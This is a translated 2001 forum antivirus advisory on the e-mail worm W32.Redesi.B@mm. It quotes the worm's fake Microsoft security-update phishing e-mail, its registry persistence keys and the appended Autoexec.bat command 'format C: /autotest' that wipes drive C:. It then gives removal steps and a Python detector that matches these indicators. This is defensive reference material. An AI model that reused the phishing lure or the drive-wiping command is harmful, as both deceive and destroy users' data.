From: emil (稻草人)
Compiled by: emil (2001-10-23 10:32:18), in-site mail
W32.Redesi.B@mm
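Virus name: W32.Redesi.B@mm
Aliases: Win32.Rede.A@mm, W32/Redesi.b@MM
Risk level: Low
Discovered: 2001/10/18
Size: 12,288 bytes
Trigger time: None
Infection symptom: sends large volumes of e-mail
Payload symptom: formats drive C:
Virus type: e-mail virus
Platform: Windows 32-bit platforms
Infection target: None
Propagation: e-mail
Description:
W32.Redesi.B@mm is a virus that spreads by e-mail. On November 11, 2001, it modifies the Autoexec.bat file so that drive C: is formatted.
The e-mail it sends has the following format:
The subject is one of the following: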
FW: Security Update by Microsoft.
FW: Microsoft security update.
FW: IT departments on state of HIGH ALERT.
FW: Important news from Microsoft.
FW: Stop terrorists computer viruses reign.
FW: Terrorists release computer virus.
FW: Emergency response from Microsoft Corp.
FW: Terrorist Emergency. Latest virus can wipe disk in minutes.
FW: Microsoft Update. Final Release Candidate.
FW: New computer virus.
Body:
Just recieved this in my email
I have contacted Microsoft and they say it's real !
-----Original Message-----
From: Microsoft Support Desk [mailto:[email protected]]
Sent: 17 October 2001 15:21
Subject: Security Update
Due to the recent spate of email spread computer viruses
Microsoft Corp has released a security patch.
Please apply the attached file to your Windows computer
to stop any futher spread or these malicious programs.
Regards
Microsoft Support
Attachment:
Common.exe
Rede.exe
Si.exe
UserConf.exe
disk.exe
If the attachment is run, the virus displays the following message box:
and copies itself to the following hidden files:
C:\Common.exe
C:\Rede.exe
C:\Si.exe
C:\UserConf.exe
C:\disk.exe
It then sends infected e-mail to all recipients in Outlook and adds the following entries to the registry:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
Rede="C:\rede.exe"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ErrorHandling\
Rede="True"
On November 11, 2001, the virus modifies the Autoexec.bat file to format drive C:, adding the following commands to the file:
ECHO Bide ye the Wiccan laws ye must, In perfect love and perfect trust.
format C: /autotest
The virus program also contains the following strings:
When misfortune is enow, wear the blue star on thy brow.
True in love ye must ever be, lest thy love be false to thee.
These words the Wiccan Rede fulfill: An ye harm none, do what ye will.
Rede(c)Si 2001 ... heh, want my phone number too ?!?
Sick of all thes 3rd world gits spreading worms. Time for a bit of Welsh stuff :)
Prevention:
1. Configure your mail settings to reject e-mail with the following subjects:
FW: Security Update by Microsoft.
FW: Microsoft security update.
FW: IT departments on state of HIGH ALERT.
FW: Important news from Microsoft.
FW: Stop terrorists computer viruses reign.
FW: Terrorists release computer virus.
FW: Emergency response from Microsoft Corp.
FW: Terrorist Emergency. Latest virus can wipe disk in minutes.
FW: Microsoft Update. Final Release Candidate.
FW: New computer virus.
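2. In the root directory of drive C:, create empty directories (note: empty directories) with the following names, to prevent the virus from creating these files: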
Common.exe
Rede.exe
Si.exe
UserConf.exe
disk.exe
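Emergency removal:
1. Delete the infected e-mail;
2. Delete the files the virus created in the root directory of drive C:. Note: these files are all hidden.
3. Repair the registry entries modified by the virus: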
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
Rede="C:\rede.exe"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ErrorHandling\
Rede="True"
4. Run sysedit.exe to edit autoexec.bat and delete
ECHO Bide ye the Wiccan laws ye must, In perfect love and perfect trust.
format C: /autotest
---- Welcome to 聊毒斋!!!
http://cnav.cn99.com or http://cnav.6to23.com
Email: [email protected]
Oicq:201604
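The subject filter from prevention step 1 and the Autoexec.bat cleanup from removal step 4, as an added Python example that is not part of the original post. The function names and the sample Autoexec.bat content are constructed for illustration; the subjects, attachment names and the two appended lines are the ones listed above.

```python
import re

# Indicators copied from the advisory text above.
SUBJECTS = {s.lower() for s in (
    "FW: Security Update by Microsoft.",
    "FW: Microsoft security update.",
    "FW: IT departments on state of HIGH ALERT.",
    "FW: Important news from Microsoft.",
    "FW: Stop terrorists computer viruses reign.",
    "FW: Terrorists release computer virus.",
    "FW: Emergency response from Microsoft Corp.",
    "FW: Terrorist Emergency. Latest virus can wipe disk in minutes.",
    "FW: Microsoft Update. Final Release Candidate.",
    "FW: New computer virus.",
)}
ATTACHMENTS = {"common.exe", "rede.exe", "si.exe", "userconf.exe", "disk.exe"}
ECHO_RE = re.compile(r"^\s*@?echo\s+bide ye the wiccan laws ye must", re.I)
FORMAT_RE = re.compile(r"^\s*@?format\s+c:\s*/autotest\b", re.I)

def mail_indicators(subject, attachment_names):
    """Return which advisory indicators a message matches (empty list = none)."""
    hits = []
    if " ".join(subject.split()).lower() in SUBJECTS:  # ignore case and extra spaces
        hits.append("subject")
    if any(name.strip().lower() in ATTACHMENTS for name in attachment_names):
        hits.append("attachment")
    return hits

def clean_autoexec(text):
    """Drop the two appended lines; return (cleaned_text, removed_lines)."""
    kept, removed = [], []
    for line in text.splitlines(keepends=True):  # keepends preserves CRLF
        if ECHO_RE.match(line) or FORMAT_RE.match(line):
            removed.append(line.rstrip("\r\n"))
        else:
            kept.append(line)
    return "".join(kept), removed

# Constructed sample input (not taken from a real machine).
SAMPLE_AUTOEXEC = (
    "@ECHO OFF\r\n"
    "SET PATH=C:\\WINDOWS;C:\\WINDOWS\\COMMAND\r\n"
    "ECHO Bide ye the Wiccan laws ye must, In perfect love and perfect trust.\r\n"
    "format C: /autotest\r\n"
)

if __name__ == "__main__":
    print(mail_indicators("fw: New computer virus. ", ["Rede.exe"]))
    print(clean_autoexec(SAMPLE_AUTOEXEC)[1])
```

Only lines that begin with the command are removed, so a commented-out `REM format c: /autotest` line is left untouched.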